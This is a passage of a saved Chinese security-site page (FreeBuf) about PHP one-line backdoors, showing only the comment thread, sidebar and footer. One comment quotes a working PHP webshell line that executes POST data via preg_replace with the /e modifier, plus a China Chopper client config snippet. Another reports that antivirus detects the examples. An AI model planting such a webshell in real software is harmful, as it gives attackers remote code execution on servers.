<li><a data-id="9772" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9772" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment even thread-even depth-1" id="li-comment-71551">
    <div id="comment-71551">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic18.png">     </div>
    <div class="tit"> 
	    <span class="name"> mark<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-20</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71551&#39;,&#39;71551&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71551#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">21楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>小舟pxz,【那些强悍的PHP一句话后门】收藏成功。本文正文大约需要10分钟的阅读时间，请访问 稍后再读! 你可以关注  获得私信提醒。</p>
<div class="comment-tools">
<div class="vote" id="vote-71551"><span id="acv_stat_71551"></span><a class="ilike_icon" id="vote4-71551" href="javascript:acv_vote(71551,1);">亮了</a>(<span id="cos_support-71551">1</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71551" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71551" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71551" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71551" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71551" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-99 odd alt thread-odd thread-alt depth-1" id="li-comment-9698">
    <div id="comment-9698">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E5%A2%A8%E5%AE%A2">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E5%A2%A8%E5%AE%A2" target="_blank">墨客&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-21</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9698&#39;,&#39;9698&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9698#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">22楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>程序代码<br>
&lt;?php<br>
@preg_replace("/[email]/e",$_POST['h'],"error");<br>
?&gt;<br>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入<br>
程序代码<br>
&lt;O&gt;h=@eval_r($_POST1);&lt;/O&gt;</p>
<p>请问为什么要在配置里加那一段代码，我测试了下，不加可以直接连；那个eval_r()是什么函数？前面也见你有提到。</p>
<div class="comment-tools">
<div class="vote" id="vote-9698"><span id="acv_stat_9698"></span><a class="ilike_icon" id="vote4-9698" href="javascript:acv_vote(9698,1);">亮了</a>(<span id="cos_support-9698">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9698" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9698" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9698" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9698" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9698" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even thread-even depth-1" id="li-comment-71550">
    <div id="comment-71550">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic8.png">     </div>
    <div class="tit"> 
	    <span class="name"> splio_testing<span class="weibo"></span> </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-21</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-71550&#39;,&#39;71550&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=71550#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">23楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>good job</p>
<div class="comment-tools">
<div class="vote" id="vote-71550"><span id="acv_stat_71550"></span><a class="ilike_icon" id="vote4-71550" href="javascript:acv_vote(71550,1);">亮了</a>(<span id="cos_support-71550">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="71550" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="71550" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="71550" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="71550" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="71550" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment odd alt thread-odd thread-alt depth-1" id="li-comment-10777">
    <div id="comment-10777">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic4.png">     </div>
    <div class="tit"> 
	    <span class="name"> John </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-06-07</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-10777&#39;,&#39;10777&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=10777#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">24楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>能不能修改下网页格式，我用印象收藏文章后，格式会发生严重变形</p>
<div class="comment-tools">
<div class="vote" id="vote-10777"><span id="acv_stat_10777"></span><a class="ilike_icon" id="vote4-10777" href="javascript:acv_vote(10777,1);">亮了</a>(<span id="cos_support-10777">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="10777" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="10777" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="10777" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="10777" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="10777" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-ppabc even thread-even depth-1" id="li-comment-46121">
    <div id="comment-46121">
        <div class="photo"> <a href="http://www.freebuf.com/author/ppabc">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/ppabc" target="_blank">ppabc&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2014-07-03</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-46121&#39;,&#39;46121&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=46121#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">25楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>学习了哈哈</p>
<div class="comment-tools">
<div class="vote" id="vote-46121"><span id="acv_stat_46121"></span><a class="ilike_icon" id="vote4-46121" href="javascript:acv_vote(46121,1);">亮了</a>(<span id="cos_support-46121">0</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="46121" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="46121" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="46121" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="46121" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="46121" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-27798 odd alt thread-odd thread-alt depth-1" id="li-comment-87525">
    <div id="comment-87525">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E6%9D%A8%E6%AF%85">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E6%9D%A8%E6%AF%85" target="_blank">杨毅&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2015-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-87525&#39;,&#39;87525&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=87525#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">26楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>我拿360主机卫士跑了下上面给的例子，好像都能查杀出来。</p>
<div class="comment-tools">
<div class="vote" id="vote-87525"><span id="acv_stat_87525"></span><a class="ilike_icon" id="vote4-87525" href="javascript:acv_vote(87525,1);">亮了</a>(<span id="cos_support-87525">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="87525" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="87525" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="87525" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="87525" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="87525" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
      </ul>
      <div class="commentnav page01" style="padding-top:10px; text-align: center;">
               </div>
	  
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/ajaxfileupload.js.下载" type="text/javascript"></script>
<div id="respond" class="comment-box">
<input type="file" id="uploadUnit" name="upfile" class="hidden" value="">
    <form action="http://www.freebuf.com/wp-comments-post.php" method="post" id="commentform">
        <div id="comment-author-info">
	    <div class="login-other">
		  <div class="login_button login_icon_sina" title="使用新浪微博登陆" onclick="login_button_click(&#39;sina&#39;)"></div>
          <div class="login_button login_icon_qq" title="使用腾讯QQ登陆" onclick="login_button_click(&#39;qq&#39;)"></div></div>
        <div class="login-input">
	    <p><label for="author">昵称</label>
		          <input type="text" name="author" id="author" value="" size="14" tabindex="1" aria-required="true" placeholder="请输入昵称" required="">
        </p><span>必须</span><span>您当前尚未登录。<a class="simplemodal-login" href="http://www.freebuf.com/wp-login.php?redirect_to=http%3A%2F%2Ffreebuf.com%2Farticles%2Fweb%2F9396.html" title="登陆">登陆？</a><a href="http://www.freebuf.com/wp-login.php?action=register" target="_blank">注册</a></span></div>
		<div class="login-input">
		  <p><label for="email">邮箱</label><input type="text" name="email" id="email" value="" size="25" tabindex="2" aria-required="true" placeholder="请输入邮箱地址" required=""></p>
		<span>必须（保密）</span>
		</div>
    </div>

        <div id="test" class="post-area">
      <div class="holiday"></div>
	    <div class="comment-editor">
			<a id="comment-smiley" href="javascript:;">表情</a><a href="javascript:;" id="imageThumb">插图</a>
	    </div>
        <div id="smileys">
           <a title="mrgreen" href="javascript:grin(&#39;:mrgreen:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_mrgreen.gif"></a><a title="razz" href="javascript:grin(&#39;:razz:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_razz.gif"></a><a title="sad" href="javascript:grin(&#39;:sad:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_sad.gif"></a><a title="smile" href="javascript:grin(&#39;:smile:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_smile.gif"></a><a title="oops" href="javascript:grin(&#39;:oops:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_redface.gif"></a><a title="grin" href="javascript:grin(&#39;:grin:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_biggrin.gif"></a><a title="eek" href="javascript:grin(&#39;:eek:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_surprised.gif"></a><a title="???" href="javascript:grin(&#39;:???:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_confused.gif"></a><a title="cool" href="javascript:grin(&#39;:cool:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_cool.gif"></a><a title="lol" href="javascript:grin(&#39;:lol:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_lol.gif"></a><a title="mad" href="javascript:grin(&#39;:mad:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_mad.gif"></a><a title="twisted" href="javascript:grin(&#39;:twisted:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_twisted.gif"></a><a title="roll" href="javascript:grin(&#39;:roll:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_rolleyes.gif"></a><a title="wink" href="javascript:grin(&#39;:wink:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_wink.gif"></a><a title="idea" href="javascript:grin(&#39;:idea:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_idea.gif"></a><a title="arrow" href="javascript:grin(&#39;:arrow:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_arrow.gif"></a><a title="neutral" href="javascript:grin(&#39;:neutral:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_neutral.gif"></a><a title="cry" href="javascript:grin(&#39;:cry:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_cry.gif"></a><a title="?" href="javascript:grin(&#39;:?:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_question.gif"></a><a title="evil" href="javascript:grin(&#39;:evil:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_evil.gif"></a><a title="shock" href="javascript:grin(&#39;:shock:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_eek.gif"></a><a title="!" href="javascript:grin(&#39;:!:&#39;)"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon_exclaim.gif"></a>        </div>
         <textarea name="comment" id="comment" cols="100%" rows="7" tabindex="4" style="overflow-x:hidden; overflow-y:hidden; border:0; width:100%;" onkeydown="if(event.ctrlKey&amp;&amp;event.keyCode==13){document.getElementById(&#39;submit&#39;).click();return false};"></textarea><div id="loading" style="display: none;"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wpspin_light.gif" style="vertical-align:middle;" alt=""> 正在提交, 请稍候...</div><div id="error" style="display: none;">#</div>
    </div>
      <div class="subcon but">
      <input class="btn btn-success" type="submit" name="submit" id="submit" tabindex="5" value="提交评论(Ctrl+Enter)">
      <a rel="nofollow" class="btn btn-default" id="cancel-comment-reply-link" href="javascript:;">取消</a>
      <div class="checkbox"><input type="hidden" name="comment_post_ID" value="9396" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
<label for="comment_mail_notify" class="comment_mail"><input type="checkbox" name="comment_mail_notify" id="comment_mail_notify" value="comment_mail_notify" checked="checked">有人回复时邮件通知我</label></div>
      </div>
    <input name="Token" id="Token" type="hidden" value="d04w6r">
  </form>
  </div>
</div>	  
<div class="commentshow">
<div class="comments-loading">Loading...</div>
</div>
<script language="javascript">
jQuery(document).ready(function($){ //Begin jQuery
    $('.reply').click(function() {
    var atid = '"#' + $(this).parent().attr("id") + '"';
    var atname = $(this).parent().find('span:first').text();
    $("#comment").val("@" + atname + " ").focus();
});
    $('.cancel-comment-reply a').click(function() { //点击取消回复评论清空评论框的内容
    $("#comment").val('');
});
}) 

jQuery(document).ready(function($) {
    $body = (window.opera) ? (document.compatMode == "CSS1Compat" ? $('html') : $('body')) : $('html,body');//commentnav ajax
    $(document).on('click', '.commentnav a', function(e) {
        e.preventDefault();
        $.ajax({
            type: "GET",
            url: $(this).attr('href'),
            beforeSend: function() {
                $('.commentnav').remove();
                $('.comment-list').remove();
                $('.comments-loading').slideDown();
            },
            dataType: "html",
            success: function(out) {
                result = $(out).find('.comment-list');
                nextlink = $(out).find('.commentnav');
                $('.comments-loading').slideUp(550);
                $('.comments-loading').after(result.fadeIn(800));
                $(".comment-list img").each(function(){
                  var url = $(this).attr("data-original");
                  $(this).attr("src",url);
                })
            }
        });
    });    
});
</script>    </div>
        <div class="col-md-3 visible-md-block visible-lg-block">
      <div class="panel panel-default">
        <div class="author-wrap">
          <div class="author-header"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-150x150.png" width="100" height="100" alt="" class="avatar avatar-100 wp-user-avatar wp-user-avatar-100 photo avatar-default"></div>
          <p class="name"><a href="http://www.freebuf.com/author/oooceo" title="由 oooceo 发布" rel="author">oooceo</a><span></span></p>
          <p class="signature">这家伙太懒，还未填写个人描述！</p>
          <p class="art-com"><span class="aut-article"><a href="http://www.freebuf.com/author/oooceo" target="_blank">1篇文章</a></span><span class="aut-comment"><a href="http://www.freebuf.com/author/oooceo?comment=1" target="_blank">7条评论</a></span></p>
        </div>
      </div>
	  <script type="text/javascript">
	          var dispatch = function() {
              q = document.getElementById("q");
              if (q.value != "") {
                  window.open('http://www.freebuf.com/?s=' + q.value, "_blank");
                     return false;
                   } else {
                       return false;
                       }
             }
	  </script>
      <div class="form-group has-active search-col search-in">
        <form id="hpsform-new" class="navbar-search navbar-form" onsubmit="return dispatch()">
          <div class="form-group">
            <input id="q" class="input form-control" type="text" placeholder="关键字查找" autocomplete="off" title="关键字查找" name="q">
            <button class="submit" onclick="INTEL_TYPE_AHEAD.onSubmitHps(&#39; 关键字查找&#39;, &#39;/content/www/cn/zh&#39;, &#39;zh_CN&#39;)" value="Search" type="submit"></button>
          </div>
        </form>
      </div>
      <div class="ad-right" style="margin-bottom:24px;">
        <a href="http://www.symantec.com/zh/cn/ssl-certificates/?sl=MSYMW000000418515&amp;om_ext_cid=ws_ad_ChinaFreebuf" target="_blank"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/14778993516986.jpg"></a>
      </div>
   
      <div class="panel panel-default">
        <div class="read visible-md-block visible-lg-block">
          <div class="main-tit02">
            <h3>相关阅读</h3>
          </div>		
          <ul>
  <li><a href="http://www.freebuf.com/vuls/80293.html" target="_blank">通过PHP反序列化进行远程代码执行</a></li>
  
  <li><a href="http://www.freebuf.com/articles/96599.html" target="_blank">PHP 使用 rand() 函数生成令牌安全吗？</a></li>
  
  <li><a href="http://www.freebuf.com/sectool/1941.html" target="_blank">phpcodegen-library[php生成shellcode函数库]</a></li>
  
  <li><a href="http://www.freebuf.com/articles/web/9396.html" target="_blank">那些强悍的PHP一句话后门</a></li>
  
  <li><a href="http://www.freebuf.com/articles/web/90837.html" target="_blank">PHP序列化与反序列化解读</a></li>
  </ul>        </div>
      </div>
      <!--<div class="ad-wrap"><a href="http://www.ijiami.cn/?freebuf.com" target="_blank"><img width="100%" src="http://image.3001.net/images/20141201/14174039186901.jpg"></a></div>-->
      <div class="panel panel-default rec-spe">
        <div class="main-tit03 colour-blue">
          <h3>特别推荐</h3>
        </div>
      <div class="rec-img"><a href="http://fit.freebuf.com/" target="_blank"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/31a4a5ab5b274a07a89356c160263fea-220x150.jpeg" width="220"></a></div>
           
      </div>
	  <div id="mar-right-sticky-wrapper" class="sticky-wrapper" style="height: 241px;"><div id="mar-right">
      <!--<div class="read visible-lg-block">
        <div class="main-tit04">
          <h3>商城新品</h3>
        </div>
        <div id="slider" class="nivoSlider">  </div>
      </div>-->
      <div class="panel panel-default code"> <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/code.jpg" width="192" height="192">
        <p>关注我们  分享每日精选文章</p>
      </div>
	  </div></div>
    </div>
  </div>
  <div class="row marvellous visible-lg-block">
    <h3>不容错过</h3>
    <ul>
      <li><a href="http://www.freebuf.com/articles/network/106623.html" rel="bookmark" title="端午“擒马”记：黑产是如何强刷用户银行卡8.1万元的？">端午“擒马”记：黑产是如何强刷用户银行卡8.1万元的？</a>
        <p>		  <span class="name"><a href="http://www.freebuf.com/author/%e8%b1%86%e8%8a%bd%e8%8f%9c" title="由 豆芽菜 发布" rel="author">豆芽菜</a></span>
		  		<span class="time">2016-06-13</span></p>
      </li>
      <li><a href="http://www.freebuf.com/articles/wireless/62535.html" rel="bookmark" title="伪基站与网络钓鱼的结合利用测试及结果分析">伪基站与网络钓鱼的结合利用测试及结果分析</a>
        <p>		  <span class="name"><a href="http://www.freebuf.com/author/legendsec" title="由 legendsec 发布" rel="author">legendsec</a></span>
		  		<span class="time">2015-04-02</span></p>
      </li>
      <li><a href="http://www.freebuf.com/articles/system/35211.html" rel="bookmark" title="五月，渗透师不得不知的微软更新">五月，渗透师不得不知的微软更新</a>
        <p>		  <span class="name"><a href="http://www.freebuf.com/author/cs24" title="由 cs24 发布" rel="author">cs24</a></span>
		  		<span class="time">2014-05-26</span></p>
      </li>
      <li><a href="http://www.freebuf.com/articles/database/93108.html" rel="bookmark" title="基于用户命令行为的内部威胁检测实验">基于用户命令行为的内部威胁检测实验</a>
        <p>		  <span class="name"><a href="http://www.freebuf.com/author/%e6%9c%a8%e5%8d%83%e4%b9%8b" title="由 木千之 发布" rel="author">木千之</a></span>
		  		<span class="time">2016-01-16</span></p>
      </li>
    </ul>
  </div>
</div>
<script type="text/javascript">
  $(window).load(function() {
    $('#slider').nivoSlider();
  });
  $('#contenttxt img').removeAttr('height');
  $('#contenttxt img').wrap(function(){
    if(!$(this).parent().attr('href')){
      var imgurl = $(this).attr('data-original');
      if(imgurl.substr(-6)=='!small'){
        imgurl = imgurl.substring(0,imgurl.length-6);
      }
      return '<a href="' + imgurl + '" class="highslide-image" onclick="return hs.expand(this);" target="_blank"></a>';
    }
  })
</script>
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/comments-ajax.js.下载" type="text/javascript"></script>
<script type="text/javascript" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/jquery.nivo.slider.pack.js.下载"></script>
<!----------footer---------->
<div class="footer">
  <div class="container">
    <div class="footer-list col-sm-2 col-md-2">
      <h3>FREEBUF</h3>
      <ul>
        <li><a href="http://www.freebuf.com/dis">免责声明</a></li>
        <li><a href="http://www.freebuf.com/news/others/864.html">关于我们</a></li>
        <li><a href="http://www.freebuf.com/jobs/40386.html">加入我们</a></li>
        <li><a href="http://www.freebuf.com/donate">捐助我们</a></li>
      </ul>
    </div>
    <div class="footer-list col-sm-2 col-md-2">
      <h3>广告及服务</h3>
      <ul>
        <li><a target="_blank" href="mailto:root@freebuf.com">寻求报道</a></li>
        <li><a href="http://www.freebuf.com/advertise">广告合作</a></li>
        <li><a target="_blank" href="mailto:help@freebuf.com">联系我们</a></li>
        <li><a href="http://www.freebuf.com/friends">友情链接</a></li>
      </ul>
    </div>
    <div class="footer-list col-sm-2 col-md-2">
      <h3>关注我们</h3>
      <ul>
        <li><div class="weixin-pannel weixin"><a class="qr" href="javascript:viod(0);"><span class="g-icon-qr1">官方微信</span><i></i></a></div></li>
        <li><a rel="nofollow" target="_blank" href="http://weibo.com/freebuf">新浪微博</a></li>
        <li><a rel="nofollow" target="_blank" href="http://t.qq.com/freebuf">腾讯微博</a></li>
        <li><a rel="nofollow" target="_blank" href="http://twitter.com/freebuf">Twitter</a></li>
      </ul>
    </div>
    <div class="footer-list col-sm-2 col-md-2">
      <h3>赞助商</h3>
      <ul>
        <li style="padding:6px 0 10px;"><a rel="nofollow" target="_blank" href="http://www.aliyun.com/?freebuf"><img src="http://image.3001.net/images/ad/ali.png" style="display: none !important;"></a></li>
        <li><a rel="nofollow" target="_blank" href="http://www.upyun.com/?freebuf"><img src="http://image.3001.net/images/ad/upyun.png" style="display: none !important;"></a></li>
        <li style="padding:6px 0 10px;"><a rel="nofollow" target="_blank" href="https://www.trustasia.com/?freebuf"><img src="http://image.3001.net/images/ad/ad-yzcx.png" style="display: none !important;"></a></li>
      </ul>
    </div>
    <div class="footer-list col-sm-2 col-md-2">
      <ul>
      </ul>
    </div>
    <div class="footer-logo col-sm-2 col-md-2 pull-right"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/freebufrobot_shendanjie.png"></div>
  </div>
  <div class="copyright"><div class="container"><p>Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved <a rel="nofollow" target="_blank" href="http://www.miitbeian.gov.cn/">沪ICP备13033796号</a></p><span><a rel="nofollow" target="_blank" href="http://click.aliyun.com/m/1336/?freebuf"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/icon-aly.png"></a></span></div></div>
</div>
<div class="bottom_tools" style="bottom: 40px;"><a id="scrollUp" href="javascript:;" title="飞回顶部" style="display: none;"></a></div>
<!----------footer end----------> 
<script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/backtop.js.下载"></script>
<script type="text/javascript">
jQuery(function(){	
	jQuery('.tabPanes ul li').click(function(){
		jQuery(this).addClass('hit').siblings().removeClass('hit');
		jQuery('.panesl>div:eq('+jQuery(this).index()+')').show().siblings().hide();	
	})
	jQuery('.vulbox-nav').click(function(e) { 
        e.stopPropagation(); 
    });  
})
</script>
<script type="text/javascript">
var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fcc53db168808048541c6735ce30421f5' type='text/javascript'%3E%3C/script%3E"));
</script><script src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/h.js.下载" type="text/javascript"></script>
<img alt="css.php" src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/css.php" width="1" height="1"><script type="text/javascript">
jQuery(function() {
    jQuery(".simditor pre").each(function(i, block){
        hljs.highlightBlock(block);    
    });
    hljs.initHighlightingOnLoad();
});
</script>
<script>
/* <![CDATA[ */
var rcGlobal = {
	serverUrl		:'http://www.freebuf.com',
	infoTemp		:'%REVIEWER% on %POST%',
	loadingText		:'Loading',
	noCommentsText	:'No comments',
	newestText		:'&laquo; 最新',
	newerText		:'&laquo; 新一点',
	olderText		:'旧一点 &raquo;',
	showContent		:'1',
	external		:'1',
